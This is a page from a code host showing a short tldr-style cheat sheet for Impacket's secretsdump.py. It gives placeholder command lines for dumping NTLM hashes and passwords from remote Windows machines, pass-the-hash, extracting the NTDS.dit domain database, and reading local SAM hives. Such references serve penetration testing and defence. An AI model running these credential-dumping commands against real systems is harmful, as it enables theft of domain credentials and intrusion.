Files
cheatsheet-tldr/tldr/secretsdump.py
2025-03-02 00:19:35 +00:00

31 lines
1.0 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
syntax: markdown
tags: [tldr, common]
source: https://github.com/tldr-pages/tldr.git
---
# secretsdump.py
> Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems.
> Part of the Impacket suite.
> More information: <https://github.com/fortra/impacket>.
- Dump credentials from a Windows machine using a username and password:
`secretsdump.py {{domain}}/{{username}}:{{password}}@{{target}}`
- Dump hashes from a machine using pass-the-hash authentication:
`secretsdump.py -hashes {{LM_Hash}}:{{NT_Hash}} {{domain}}/{{username}}@{{target}}`
- Dump credentials from Active Directorys NTDS.dit file:
`secretsdump.py -just-dc {{domain}}/{{username}}:{{password}}@{{target}}`
- Extract credentials from a local SAM database using registry hives:
`secretsdump.py -sam {{path/to/SAM}} -system {{path/to/SYSTEM}}`
- Dump hashes from a machine without providing a password (if a valid authentication session exists, e.g. via Kerberos or NTLM SSO):
`secretsdump.py -no-pass {{domain}}/{{username}}@{{target}}`